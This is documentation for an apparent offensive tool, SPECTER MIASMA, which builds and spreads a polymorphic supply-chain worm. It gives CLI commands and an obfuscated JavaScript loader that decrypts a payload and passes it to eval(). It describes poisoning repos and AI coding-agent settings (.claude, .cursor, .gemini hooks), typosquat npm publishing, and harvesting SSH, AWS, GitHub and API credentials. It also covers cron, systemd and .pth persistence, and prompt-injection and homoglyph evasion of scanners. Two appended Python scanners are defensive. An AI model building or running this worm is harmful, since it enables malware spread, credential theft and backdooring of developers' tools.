Install
pip install git+https://github.com/RichardBarron27/red-specter-specter-miasma.git
specter-miasma --help
Dependencies: click, cryptography, pynacl, requests, gitpython. Python 3.10+.
Gate Tiers
| Gate | Flag / Env | Subsystems |
|---|---|---|
| OPEN | none | ENUMERATE-TARGETS, scan_content() |
| INJECT | MIASMA_INJECT_KEY env | POISON-REPO, PUBLISH-PACKAGE, EVADE-SCANNERS |
| MUTATE | --mutate flag | FORGE-PAYLOAD, MUTATE-PAYLOAD |
| UNLEASHED | --confirm-destroy + MIASMA_SIGNING_KEY env | PROPAGATE-WORM, HARVEST-CREDENTIALS, PERSIST-WORM |
MUTATE is a preparation gate. It is required before injection. --mutate explicitly acknowledges that you are generating a live polymorphic worm payload for an authorised engagement.
Polymorphic Pipeline
FORGE-PAYLOAD orchestrates five stages in sequence. Each stage receives the output of the previous one. The seed determines all randomness: the same integer seed produces identical output on every invocation.
| Stage | File | Operation | Output |
|---|---|---|---|
| 1 | encryptor.py | AES-256-GCM per-file encryption via HKDF | key_hex, nonce_hex, ciphertext_hex |
| 2 | obfuscator.py | Random comment injection (density=8) | Augmented source |
| 3 | mutator.py | Variable rename (16 identifiers, seeded suffix) | Transformed source |
| 4 | obfuscator.py | Dead vars + string split + IIFE wrap | Obfuscated JS |
| 5 | mutator.py | Three-layer loader: base64 → XOR → AES → eval() | loader.js, loader.py, binding.gyp |
HKDF Key Derivation
seed_bytes = HKDF(input_key_material=seed, salt=b"miasma-seed", info=b"", length=32)
aes_key = HKDF(seed_bytes, salt=b"miasma-aes-key", info=str(file_index).encode(), length=32)
aes_nonce = HKDF(seed_bytes, salt=b"miasma-aes-nonce", info=str(file_index).encode(), length=12)
xor_key = HKDF(seed_bytes, salt=b"miasma-xor-key", info=b"", length=32)
Three-Layer Loader (JS)
(function(){
var _d1=0, _d2=false; // dead vars
var _b64 = "BASE64_ENCODED_XOR_ENCRYPTED_AESENCRYPTED_PAYLOAD";
var _xk = [/* 32-byte XOR key array */];
var _xa = atob(_b64).split('').map((c,i) => String.fromCharCode(c.charCodeAt(0)^_xk[i%32])).join('');
var _c = require('crypto').createDecipheriv('aes-256-gcm', Buffer.from('AES_KEY_HEX','hex'), Buffer.from('NONCE_HEX','hex'));
_c.setAuthTag(Buffer.from('TAG_HEX','hex'));
var _p = Buffer.concat([_c.update(Buffer.from(_xa,'hex')), _c.final()]);
eval(_p.toString());
})();
ENUMERATE-TARGETS
specter-miasma enumerate [--output ./target-profile.json]
Discovers all AI coding agents, package managers, git repos, CI/CD config, and credential locations. Returns TargetProfile. No network connections. OPEN gate — no key required.
FORGE-PAYLOAD
specter-miasma forge --seed 42 --output ./worm/
specter-miasma forge --seed random --output ./worm/ # unique per run
Runs all 5 pipeline stages. Writes to output_dir: loader.js (three-layer IIFE), loader.py (Python exec wrapper), binding.gyp (native compile target), metadata.json (keys + hashes). Requires --mutate flag (MUTATE gate).
POISON-REPO
export MIASMA_INJECT_KEY="$(cat ~/.config/red-specter/miasma-inject.key)"
specter-miasma poison --repo-path ./target-repo/ --payload ./worm/
Injects 8 vectors: package.json hooks, .claude/settings.json Stop+PostToolUse, .cursorrules, .gemini/settings.json, miasma.pth, binding.gyp, loader.js, loader.py. Zero-width non-joiner (U+200C) inserted after exec/eval/require/fetch in loader.js. INJECT gate.
PUBLISH-PACKAGE
# Dry run (default) — builds manifest only
specter-miasma publish --registry npm --package lodash --strategy typosquat --payload ./worm/ --dry-run
# Live publish (INJECT gate) — requires VERDACCIO_URL or DEVPI_URL
export VERDACCIO_URL="http://verdaccio.internal:4873"
specter-miasma publish --registry npm --package lodash --strategy typosquat --payload ./worm/
PROPAGATE-WORM
export MIASMA_SIGNING_KEY="$(cat ~/.config/red-specter/miasma-signing.key)"
specter-miasma propagate \
  --scan-root . \
  --payload ./worm/ \
  --signing-key ~/.config/red-specter/miasma-signing.key \
  --confirm-destroy \
  --exclude /path/to/skip
UNLEASHED gate. Discovers all git repos, skips already-poisoned (checks "MIASMA" in loader.js), injects each fresh repo, injects GitHub Actions workflows. blast_radius.estimated_downstream_devs = repos × 12.
HARVEST-CREDENTIALS
specter-miasma harvest --scan-root . --signing-key ./signing.key --confirm-destroy
UNLEASHED gate. Scans env vars, system credential paths (~/.ssh/id_ed25519, ~/.config/gh/hosts.yml, ~/.aws/credentials, etc.), and .env* files. 11 regex patterns including github_token, aws_access_key_id, anthropic_api_key, ssh_private_key. scan_content() is public (OPEN gate) for inline scanning.
PERSIST-WORM
specter-miasma persist --install-root . --payload ./worm/ --signing-key ./signing.key --confirm-destroy
UNLEASHED gate. 7 mechanisms: Python .pth (site-packages), .claude/settings.json Stop hook, .cursor/rules, .gemini/settings.json hook, cron (@reboot + */30), systemd timer (OnBootSec=5min, OnUnitActiveSec=30min), GitHub Actions backdoor. survival_guaranteed = True when ≥4 installed.
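For defenders, the file-based locations named under POISON-REPO and PERSIST-WORM can be audited directly. The following is an added example, not part of the tool or its documentation: it walks a directory tree and reports .pth lines that Python's site module would execute at startup, command hooks in agent settings files, and npm install-time scripts. It assumes hooks sit under a top-level "hooks" key in both .claude/settings.json and .gemini/settings.json; audit_tree and its finding labels are names invented for this sketch.

```python
import json
from pathlib import Path

AGENT_SETTINGS = (".claude/settings.json", ".gemini/settings.json")
INSTALL_SCRIPTS = ("preinstall", "install", "postinstall")

def _commands(node):
    """Recursively yield every "command" string found under a hooks object."""
    if isinstance(node, dict):
        for key, val in node.items():
            if key == "command" and isinstance(val, str):
                yield val
            else:
                yield from _commands(val)
    elif isinstance(node, list):
        for item in node:
            yield from _commands(item)

def _load(path):
    """Parse a JSON file, returning {} when it is unreadable or not an object."""
    try:
        data = json.loads(path.read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return {}
    return data if isinstance(data, dict) else {}

def audit_tree(root):
    """Return (relative_path, finding_kind, detail) tuples for auto-run entry points."""
    root, findings = Path(root), []
    for path in sorted(root.rglob("*")):  # rglob also descends into dot-directories
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.suffix == ".pth":
            # site.py executes .pth lines that start with "import" + space/tab
            for line in path.read_text(errors="replace").splitlines():
                if line.startswith(("import ", "import\t")):
                    findings.append((rel, "pth_executable_line", line.strip()))
        elif rel.endswith(AGENT_SETTINGS):
            for cmd in _commands(_load(path).get("hooks", {})):
                findings.append((rel, "agent_hook_command", cmd))
        elif path.name == "package.json":
            scripts = _load(path).get("scripts", {})
            for name in INSTALL_SCRIPTS:
                if isinstance(scripts, dict) and name in scripts:
                    findings.append((rel, "npm_install_script", f"{name}: {scripts[name]}"))
    return findings
```

Every finding is a review prompt rather than a verdict: legitimate packages ship .pth files and postinstall scripts, so compare the output against a known-good baseline of the same tree.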
EVADE-SCANNERS
specter-miasma evade --payload ./worm/ --seed 42 --techniques zero_width,homoglyphs,prompt_injection
INJECT gate. 6 prompt injection templates embedded in package.json description field. Zero-width non-joiner (U+200C) after sensitive keywords. Homoglyph substitution at 15% rate (Cyrillic a/e/o/p/c, Greek o). Multi-stage base64 split: payload halved, each base64-encoded, combined with atob(_sa)+atob(_sb) in eval.
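The text-level evasions listed here and under POISON-REPO leave artefacts that a source scanner can flag. The following is an added example, not part of the tool: it reports invisible code points directly after exec/eval/require/fetch, tokens that mix Latin with Cyrillic or Greek letters, and eval over concatenated atob() calls. scan_text, the finding labels and SAMPLE are constructed for this sketch, and the invisible-character set is widened beyond U+200C as a generalisation.

```python
import re
import unicodedata

# U+200C is the code point the page names; the others are common invisible relatives.
INVISIBLE = "\u200b\u200c\u200d\u2060\ufeff"
KEYWORD_ZW = re.compile(r"\b(exec|eval|require|fetch)[" + INVISIBLE + "]+")
# eval( atob(a) + atob(b) ... ), tolerating invisible characters after "eval"
SPLIT_B64 = re.compile(
    r"eval[\s" + INVISIBLE + r"]*\(\s*atob\s*\([^)]*\)\s*\+\s*atob\s*\(")
WORD = re.compile(r"\w+")

def scripts(token):
    """Return the Unicode script prefixes (LATIN, CYRILLIC, GREEK, ...) of a token's letters."""
    found = set()
    for ch in token:
        if ch.isalpha():
            found.add(unicodedata.name(ch, "UNKNOWN").split(" ")[0])
    return found

def scan_text(text):
    """Return (line_number, finding_kind, detail) tuples for one source file's text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in KEYWORD_ZW.finditer(line):
            findings.append((lineno, "zero_width_after_keyword", m.group(1)))
        if SPLIT_B64.search(line):
            findings.append((lineno, "split_base64_eval", "atob+atob"))
        for tok in WORD.findall(line):
            s = scripts(tok)
            if "LATIN" in s and s & {"CYRILLIC", "GREEK"}:
                # ascii() makes the look-alike letter visible as an escape
                findings.append((lineno, "mixed_script_token", ascii(tok)))
    return findings

# Constructed sample: ZWNJ after require, Cyrillic "o" in an identifier, split base64 eval.
SAMPLE = (
    'var m = require\u200c("fs");\n'
    "var l\u043eader = 1;\n"
    "eval(atob(_sa)+atob(_sb));\n"
    "var ok = fetch(url);\n"
)

if __name__ == "__main__":
    for finding in scan_text(SAMPLE):
        print(finding)
```

Identifiers written entirely in one non-Latin script are not flagged; only tokens that mix scripts are, which keeps false positives low on internationalised code bases.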
MUTATE-PAYLOAD
specter-miasma mutate --payload ./worm/ --new-seed 99 --output ./worm-v2/ --mutate
MUTATE gate. Regenerates from new seed. Validates: hash_differs, loader_js_differs, aes_key_differs, xor_key_differs, b64_differs — all True for any seed difference. 100 sequential seeds → 100 unique payload hashes (validated in test suite).
Report Format
{
"report_id": "MIA-a3f1c9d82e40",
"module": "T151 SPECTER MIASMA",
"version": "1.0.0",
"timestamp": "2026-06-19T14:23:11.000Z",
"target_profile": { "agents": ["claude_code", "cursor"], ... },
"payload": { "payload_hash": "sha256hex...", "mutator_seed": 42, "files": [...] },
"repos_poisoned": ["/home/dev/my-app", ...],
"packages_published": ["lodash-utils@1.0.1"],
"credentials_harvested": { "total_found": 3, "credentials": [...] },
"persistence_mechanisms": [{"type": "python_pth"}, ...],
"evasion_techniques": ["zero_width", "homoglyphs", "prompt_injection"],
"mutation_records": [{"old_seed": 42, "new_seed": 99, ...}],
"blast_radius": {
"repos_poisoned": 5,
"packages_published": 1,
"persistence_count": 4,
"estimated_downstream_devs": 60
},
"mitre_attack": ["T1195", "T1195.001", "T1195.002", "T1078", "T1098", "T1528", "T1552"],
"mitre_atlas": ["AML.T0018", "AML.T0040", "AML.T0054"],
"wmd_classes": ["polymorphic_supply_chain_worm", "ai_agent_config_backdoor", ...],
"kill_chain_summary": "ENUMERATE-TARGETS > FORGE-PAYLOAD > POISON-REPO > PUBLISH-PACKAGE > PROPAGATE-WORM > HARVEST-CREDENTIALS > PERSIST-WORM > EVADE-SCANNERS > MUTATE-PAYLOAD",
"signature": "ed25519_hex_128_chars_or_null"
}
MITRE Coverage
| ID | Name | Subsystem |
|---|---|---|
| T1195 | Supply Chain Compromise | PUBLISH-PACKAGE |
| T1195.001 | Compromise Software Dependencies | POISON-REPO |
| T1195.002 | Compromise Software Supply Chain | PROPAGATE-WORM |
| T1078 | Valid Accounts | HARVEST-CREDENTIALS (OIDC) |
| T1098 | Account Manipulation | PUBLISH-PACKAGE (SLSA) |
| T1528 | Steal Application Access Token | HARVEST-CREDENTIALS |
| T1552 | Unsecured Credentials | HARVEST-CREDENTIALS |
| AML.T0018 | Backdoor ML Model | POISON-REPO (.claude hooks) |
| AML.T0040 | ML Supply Chain Compromise | FORGE-PAYLOAD + PUBLISH-PACKAGE |
| AML.T0054 | LLM Jailbreak | EVADE-SCANNERS |